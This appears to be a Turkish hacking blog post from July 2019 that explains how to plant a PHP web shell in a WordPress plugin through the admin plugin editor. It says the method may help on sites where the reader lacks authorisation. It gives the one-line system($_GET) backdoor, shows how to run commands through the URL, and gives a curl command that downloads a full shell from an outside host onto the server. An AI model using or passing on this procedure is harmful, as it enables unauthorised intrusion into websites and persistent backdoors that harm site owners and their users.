Newest Post
// On :7 Temmuz 2019 Pazar
merhaba arkadaşlar bugün benim bildiğim sizlerin %99 bilmediği bir yol ile wordpress sistemlerde
komut çalıştırmayı anlatacağım konuyu yabancı bir kayaktan çevirdim
bu şekilde yetki olmayan sitelerde belki işinize yarar
şimdi wordpress yönetici panelinden
pluging>editör
izliyoruz
şimdi herhangi bir pluging seçin
url şu şekilde oldu
/wp-admin/plugin-editor.php?file=akismet/index.php
şimdi editleyeceğiz
şimdi size vereceğim kodu yapıştırıyorsunuz
Önemli
<pre><?php system($_GET['x'])?></pre>
şimdi
öreksitecom/wp-content/plugins/akismet/?x=
bu şekilde konsol çalıştırabilirsiniz
burdan shellde yükleyebilirsiniz
genelde nginx serverlerde çalışan bi yöntemdir
örnek
öreksitecom/wp-content/plugins/akismet/?x=dir
yaptığınız gibi size içerdekileri gösterir
gördüğünüz gibi gayet pratik bir yöntem
curl shellyüküsitecom/shell.txt -o kartal.php şeklinde komut çalıştırdığınızda kartal.php isminde
shellyüküsitecom/shell.txt sitesindeki shellin yüklü olduğu bir dosya size verecektir
Kayıtlar
